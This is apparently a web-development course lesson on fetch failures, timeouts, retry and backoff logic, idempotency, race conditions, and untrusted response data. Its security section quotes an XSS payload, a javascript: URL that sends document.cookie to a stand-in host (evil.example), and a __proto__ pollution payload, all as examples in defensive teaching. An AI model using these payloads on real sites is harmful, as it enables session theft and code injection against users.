Learning Objectives
- Name eight failure modes and say what your code sees for each
- Pick a timeout for a given request and defend the number
- Say which methods RFC 9110 calls idempotent, and why safe is a different word
- Decide which failures to retry, and separately which requests may be sent a second time at all
- Write exponential backoff with jitter, a cap, and a fresh
AbortSignalper attempt - Read
Retry-Afteryourself, in both of its formats - Name the three retries a browser performs without being asked, and what is not on that list
- Guard
JSON.parseon a 200 and report the failure as its own kind - Stop a stale response from painting, two ways
- Put a string from an endpoint on the page without giving it a script
What actually fails
Eight things go wrong. Five of them reject the fetch promise or throw on the way to the data, two resolve with a status you have to read, and one produces no error anywhere.
| What failed | What your code sees | How you tell |
|---|---|---|
| DNS did not resolve | TypeError. In Chrome the message is Failed to fetch. | You cannot, from the page. See below. |
| Connection refused, reset, or no network at all | TypeError, Failed to fetch | navigator.onLine is false for the offline case only, and it lies on captive portals |
| TLS handshake rejected: expired certificate, name mismatch, unknown authority | TypeError, Failed to fetch | The console gets a net::ERR_CERT_ line. Your catch block does not. |
| Connected, request sent, nothing comes back | A promise that stays pending until you impose a deadline | AbortSignal.timeout(), which rejects with a TimeoutError DOMException |
| 4xx: the request was wrong | The promise resolves. response.ok is false. | response.status: 400, 401, 403, 404, 409, 422, 429 |
| 5xx: the server or a gateway failed | The promise resolves. response.ok is false. | response.status: 500, 502, 503, 504 |
200, correct Content-Type, body that will not parse | The promise resolves and response.ok is true. response.json() rejects. | A SyntaxError from the parser, and only if you caught it |
| A response arrives after one you sent later | Nothing. Every request succeeded. | Your own bookkeeping, because the platform has none |
The first three arrive as one exception with one message. Reporting which of them happened would let any page probe hosts it has no other way to see: whether a name resolves on this network, whether a port is open, whether an internal service is running. Chrome writes a net::ERR_NAME_NOT_RESOLVED or net::ERR_CERT_DATE_INVALID line to the console, where a human can read it. JavaScript gets TypeError: Failed to fetch for all of them. Firefox uses one message too, NetworkError when attempting to fetch resource.
Step 05 mapped those exceptions onto three kinds: 'network', 'timeout', and 'abort'. This step adds three more. 'status' for a response you got and did not want, 'content' for a response whose bytes are not what the header claimed, and 'body' for a transfer that broke before the last byte arrived.
The last row produces no error. Nothing on the platform reports it, so the Ordering section below is about finding it yourself.
Timeouts
fetch has no timeout option. If a server accepts the connection and then says nothing, the promise stays pending. The browser will eventually drop a socket that produces nothing, on a schedule that is not specified, not readable from JavaScript, and not the same on every network. Set your own deadline.
Picking the number
Pick it from what the user is doing, not from the endpoint's average response time. Jakob Nielsen's three limits, from Usability Engineering in 1993, still describe the attention you are spending: 0.1 seconds feels instant, 1 second is the limit for uninterrupted thought, and 10 seconds is the limit for keeping someone's attention on the task at all.
| Request | Deadline | Why that number |
|---|---|---|
| Autocomplete, one per keystroke | 1000 ms | The answer is worthless once the user has typed the next letter. A slow one is not worth waiting for. |
| A list the user is watching load | 8000 ms | Inside Nielsen's 10 seconds, with room for a retry to start before the user gives up. |
| An export the user asked for and expects to take a while | 30000 ms | They chose to wait. Show progress and honor the choice. |
| A background write of a draft | 5000 ms | Nobody is watching. Fail fast, keep the draft locally, and try again on the next tick. |
Step 05 covered AbortSignal.timeout(), the clock that starts when you call it, and AbortSignal.any() for combining a deadline with a user's cancel.
AbortSignal.timeout() fires once and stays fired. Measured in Node 25.4.0, and the same in Chrome: after the timeout elapses, signal.aborted is true forever, signal.reason stays the TimeoutError, and AbortSignal.any([firedSignal]) comes back already aborted. Hand that signal to a second fetch and the second fetch rejects before it opens a connection. A retry loop needs a new signal on every pass.
Retries, and when not to
Retry when the failure was about the moment, not the request. Four kinds qualify.
What to retry
- Network failure. The request never reached a server, so nothing happened on the other side.
- Timeout. No response arrived in the time you allowed. Read the warning below before you retry a write.
- 502, 503, 504. 502 and 504 come from a gateway that got an invalid response from the origin or stopped waiting for one. RFC 9110 section 15.6.4 defines 503 as the server itself reporting a temporary overload or scheduled maintenance. All three describe a condition that can be gone a second later.
- 500, with less confidence. 500 is the generic one. It covers a handler with a bug in it, which will throw again on the same input, and a handler that lost its database connection, which may not. The status does not tell those apart. Retry it, and keep the attempt count small, because some of the time you are repeating a failure that cannot come out differently.
/api/flakyin the demo answers 500, where a service that is actually overloaded would answer 503 with aRetry-After.
What not to retry
- Any 4xx. The request was wrong, and sending the same wrong request again produces the same 4xx. A 401 needs credentials, a 404 needs a different URL, a 422 needs a different body.
- An abort. The user pressed Cancel.
- A body that would not parse. The bytes were wrong, not late.
429 is the exception to the 4xx rule. It means you sent too many requests, so waiting is the fix, and the server usually says how long in a Retry-After header.
Idempotent is not the same as safe
RFC 9110 section 9.2.1 calls a method safe when its semantics are read-only. GET, HEAD, OPTIONS, and TRACE are safe. Section 9.2.2 calls a method idempotent when the intended effect of several identical requests is the same as the effect of one, and names PUT, DELETE, and the safe methods. DELETE is idempotent and not safe: send it twice and the resource is gone, which is the same state as sending it once.
| Method | Safe | Idempotent | Safe to repeat when no response arrived |
|---|---|---|---|
GET, HEAD | Yes | Yes | Yes |
OPTIONS, TRACE | Yes | Yes | Yes |
PUT | No | Yes | Yes. It writes the same representation either way. |
DELETE | No | Yes | Yes, though the second one may answer 404 |
POST | No | No | No |
PATCH | No | No | No. {"count": "+1"} applied twice is +2. |
Do not blindly retry a POST
A timeout means no response arrived. It does not mean nothing happened. The request may have reached the handler, the handler may have written the row, and the response may have been lost on the way back. Retry that POST and the user has two orders, two comments, or two charges.
RFC 9110 section 9.2.2 states it directly: a client SHOULD NOT automatically retry a request with a non-idempotent method unless it has some means to know the request semantics are actually idempotent, or some means to detect that the original request was never applied.
The means is an idempotency key. Generate one per logical operation, send it with the request, and the server stores the result under that key and returns the stored result if the key comes back. Stripe's Idempotency-Key header is the widely copied version of this.
crypto.randomUUID() needs a secure context. The Secure Contexts specification counts https: and wss:, the loopback ranges 127.0.0.0/8 and ::1/128, host names ending in localhost, and file:. /api/posts in this series reads no such header and does not persist, so nothing here can demonstrate the server half.
Backoff, jitter, and a cap
Retrying immediately aims a second request at a server that just failed to answer the first. Exponential backoff spaces the attempts out: wait 300 ms, then 600, then 1200. The doubling does not stop on its own, so cap it. At a 300 ms base, an uncapped attempt 10 waits 154 seconds and attempt 12 waits over 10 minutes.
Add jitter. A server that falls over drops every connected client at once, and every one of those clients waits the same 300 ms and comes back together. Multiplying the delay by a random fraction spreads the returning clients across the whole window.
Retry-After is yours to read
fetch does not honor it. The string Retry-After does not appear anywhere in the Fetch standard. A 429 or a 503 carrying it resolves as fast as any other response, and the header sits in response.headers until you read it.
RFC 9110 section 10.2.3 defines two formats: Retry-After = HTTP-date / delay-seconds, where delay-seconds is a non-negative decimal integer. Both are in the RFC's own examples: Retry-After: 120 and Retry-After: Fri, 31 Dec 1999 23:59:59 GMT. The spec attaches it to 503 and to any 3xx; RFC 6585 attaches it to 429; RFC 9110 section 15.5.14 says a 413 SHOULD carry it when the condition is temporary. Handle both formats and clamp the result, because a server under load is entitled to say 3600 and your page is not going to wait an hour.
What the browser retries without asking
Three cases. A 500 is a completed exchange and a timeout is your deadline, so neither is on the list.
- A 421 Misdirected Request, once. The Fetch standard's HTTP-network-or-cache fetch algorithm re-runs itself on a new connection when the response status is 421, this is not already the new-connection attempt, and the request's body is null or has a replayable source. One retry, then it gives up.
- An HTTP/2 stream the server says it never processed. RFC 9113 section 8.7: a GOAWAY frame names the highest stream that might have been processed, and a
REFUSED_STREAMin aRST_STREAMmeans no processing occurred. Requests covered by either guarantee may be retried automatically, including a POST, because the server has promised nothing happened. - A connection that closed before any response arrived. RFC 9110 section 9.2.2 permits an automatic repeat for an idempotent method here, and describes the riskier practice of guessing that a POST is safe to repeat when an idle persistent connection closed before any part of a response arrived.
The loop
Step 05's transport returned one Result object for both fetch and XMLHttpRequest. This is that function with a loop around it, five kinds instead of three, and a fresh signal per attempt.
One function is not enough. retryable() reads the status, and no status tells you whether the server already did the thing. A 504 means a gateway stopped waiting for an origin that may have committed the write a moment later, which makes it more likely to be sitting on a completed side effect than a 500 is. The axis for side effects is the method, and RFC 9110 section 9.2.2 is where it lives. Ask both questions.
Count the worst case before you ship it
Three attempts at an 8-second deadline is 24 seconds of request time. Add the backoff waits, up to 300 ms and 600 ms, and a user watching a list can wait 24.9 seconds to be told it failed. Nielsen's outer limit was 10. Either cut the attempts, cut the deadline, or put a total budget around the whole loop and stop when it runs out. The demo below defaults to a 2000 ms deadline and 3 attempts for the same reason.
Content errors
/api/bad-json answers 200 with Content-Type: application/json; charset=utf-8 and this body:
Everything a status check looks at is correct. response.ok is true, response.status is 200, and the Content-Type is the one you wanted. The bytes stop in the middle of an object.
Real causes: a proxy that truncated the body, a load balancer that returned its own HTML error page under the upstream's headers, a handler that wrote the header and then threw, a captive portal answering for a network you have not signed into yet. Checking Content-Type does not help here, because this endpoint sends the right one.
Guard the parse and keep the text. response.json() consumes the body, so a rejection there leaves you with nothing to log. Read response.text() once and parse the string yourself, and the first 200 characters are still in hand when it fails.
Parsing is not the last check either. A body can be valid JSON and still be the wrong shape: a 404's error object where you expected a list, null where you expected an array, a count that arrived as a string.
Ordering
A search box fires a request per keystroke. The user types abcd in under half a second, so four requests are open at once. HTTP has no rule that says answers come back in the order the questions went out, and they frequently do not: different connections, different cache states, different amounts of work per query.
| Sent at | Query | Server took | Painted at |
|---|---|---|---|
| 0 ms | a | 900 ms | 900 ms, last |
| 120 ms | ab | 400 ms | 520 ms |
| 240 ms | abc | 200 ms | 440 ms |
| 360 ms | abcd | 100 ms | 460 ms |
At 900 ms the input says abcd and the list underneath it is the answer for a. All four requests returned 200. No exception was thrown and nothing was logged. On a fast connection the spread is small enough that the bug never shows up in development.
Fix one: abort the previous request
Keep the controller for the request in flight. When a new one starts, abort the old one. The old fetch rejects with an AbortError, the connection is released, and the response never reaches your render function.
Fix two: number the requests
Give every request a ticket. After the await, compare the ticket against the highest one already painted and drop anything older. Take the comparison and the claim in the same synchronous step, because two responses can be sitting in the microtask queue at the same time.
Use abort
The ticket lets every request run to completion. The bytes still arrive, the connection stays busy, and the server does the work for three queries nobody will read. Abort stops the transfer, frees the connection for the request you care about, and gives the server a chance to notice the client left.
The ticket earns its place when you cannot cancel: a POST already on the wire, a request shared by two call sites, or work that has to finish for reasons other than painting. The demo has all three.
Never trust the response
A response body is input from outside your program. That is true of a third-party API, and it is true of your own endpoint, because your own endpoint stores what somebody typed into it. Somebody typed <img src=x onerror=alert(document.cookie)> into your title field and pressed Submit.
JSON.parse executes nothing. It is not eval, it does not run functions, and there is nothing in the JSON grammar that can call anything. Parsing that title gives you a 42-character string.
textContent writes characters. It never invokes the HTML parser, so no element, attribute, or handler can come out of it. Use it for every value that came off the wire.
What textContent does not cover
It protects the text of an element. Four things sit outside that.
- Attributes.
a.href = post.urlwith aurlofjavascript:fetch('https://evil.example/?c='+document.cookie)runs on click. Same forsrc,formaction, andxlink:href. Parse the value and check the scheme. - Other HTML sinks.
innerHTML,outerHTML,insertAdjacentHTML,document.write,Range.createContextualFragment, andiframe.srcdocall parse.srcdoclooks like a string attribute and parses a whole document. - A
<script>element.textContenton a script you then insert into the document is source code, and it runs. - Style. A value dropped into a
styleattribute or a stylesheet can load a URL and can cover the page with a transparent element.
"__proto__" in a payload
JSON.parse handles this key safely and the code around it often does not. Parsing {"__proto__": {"isAdmin": true}} gives an object with an own data property named __proto__. The prototype is untouched, the setter on Object.prototype is never invoked, and no other object in the page changes. An object literal with the same text behaves differently: it sets the prototype.
Reject the key on the way in if you merge parsed data into anything. JSON.parse(text, reviver) takes a reviver that can return undefined for a key named __proto__, which drops it. Object.create(null) for the target of a merge removes the setter from the picture entirely.
Demo: retries, timeouts, and a race
Two experiments on one page. The top half runs the loop from this step against whichever failure endpoint you pick and logs every attempt with its status and its elapsed milliseconds. The bottom half fires three requests at /api/slow with descending delays so the answers come back in reverse, with a guard you can switch between off, a ticket, and abort.
What changed from step 06: the three encoding panels are gone, because every request here is a GET. An endpoint selector, a timeout field, an attempt count, and a backoff toggle replace them. The instrumentation strip keeps the load counter, the request counter, the build time, and the query string, and adds the attempts on the last run, how it ended, and the total time spent waiting between attempts.
Six things to run.
- Watch a timeout fire. Pick
/api/slowwith 3000 ms and leave the deadline at 2000. Every attempt gives up at about 2000 ms and the run endstimeout. Raise the deadline to 4000 and the first attempt succeeds. - Watch a retry succeed. Pick
/api/flakyat rate 0.5. It answers 500 half the time, so most runs show a failed attempt followed by a good one. The Then waited column is the backoff between them. - Turn jitter off. Three attempts means two waits. The log prints each one against its ceiling, and the ceiling doubles: 300 ms, then 600. Full jitter picks a random point below the ceiling, so the ceiling grows on every attempt and an individual wait need not. Turn backoff off and both waits are a flat 300 ms.
- Fail all the way. Set
/api/flakyto rate 1.0. Every attempt is a 500, the loop spends its three attempts, and the final outcome is the last one rather than an exception. - Break the body. Pick
/api/bad-json. The status is 200 and the run endscontent, with the parser's message and the first 200 characters of what arrived. It is not retried, and the attempt log shows one row. - Race three requests. With the guard off, press Fire three fast. Three GETs go out 120 ms apart, the way a fast typist produces them, asking for 900, 500, and 100 ms of delay. The third one paints first and the first one paints last, leaving the oldest answer on screen. Switch the guard to newest wins and the two late arrivals are counted and dropped. Switch it to abort previous and only one request is left alive to answer.
The waterfall records every attempt as its own row, so a run of three against /api/flaky is three entries with three statuses. Aborted requests appear there too. The ticket guard leaves three completed rows; the abort guard leaves one completed and two canceled.
Next Steps
Everything so far has talked to cse134.site from a page served by cse134.site. Step 8: Other people's data changes the origin:
- CORS as client code experiences it, which is a failure with no status and no headers to read
- What triggers a preflight, and what it costs
- The same-origin proxy, and what you take on by running one
- Scraping and mashups: how fragile a dependency on data nobody promised you actually is